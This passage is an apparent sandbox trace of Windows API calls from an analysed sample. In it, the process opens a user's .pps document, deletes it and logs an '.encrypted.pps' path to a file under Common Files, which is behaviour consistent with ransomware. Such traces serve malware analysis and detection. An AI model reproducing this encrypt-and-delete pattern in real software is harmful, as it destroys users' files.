1 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.186] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.186] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x36c3c50, ftLastWriteTime.dwHighDateTime=0x1d5bf0e, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x0, dwReserved1=0x777648, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0x7c2240 [0036.186] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.186] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.186] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.186] CharLowerBuffW (in: lpsz="byte[90799]", cchLength=0xb | out: lpsz="byte[90799]") returned 0xb [0036.187] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.187] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.187] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.187] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.187] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.187] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.188] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.188] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.189] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\d4y-2lnu.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.189] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.189] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.189] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.189] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.190] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.190] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.190] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.190] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.190] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.191] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFilePart=0x0) returned 0x46 [0036.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x15477a80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0x7c2240 [0036.191] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\d4y-2lnu.pps")) returned 1 [0036.192] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x15477a80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 0 [0036.193] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.193] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.193] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.193] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.193] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.193] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.193] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.194] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.194] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.194] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.194] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.194] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.194] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.194] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.194] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.194] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1d65, lpOverlapped=0x0) returned 1 [0036.195] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.195] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1d65, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.195] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.encrypted.pps\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0036.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53) returned 0x794b90 [0036.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.encrypted.pps\r\n", cchWideChar=83, lpMultiByteStr=0x794b90, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.encrypted.pps\r\n", lpUsedDefaultChar=0x0) returned 83 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0036.195] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x52, lpOverlapped=0x0) returned 1 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0036.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.195] CloseHandle (hObject=0x128) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.197] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.197] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.197] HeapFree (in: 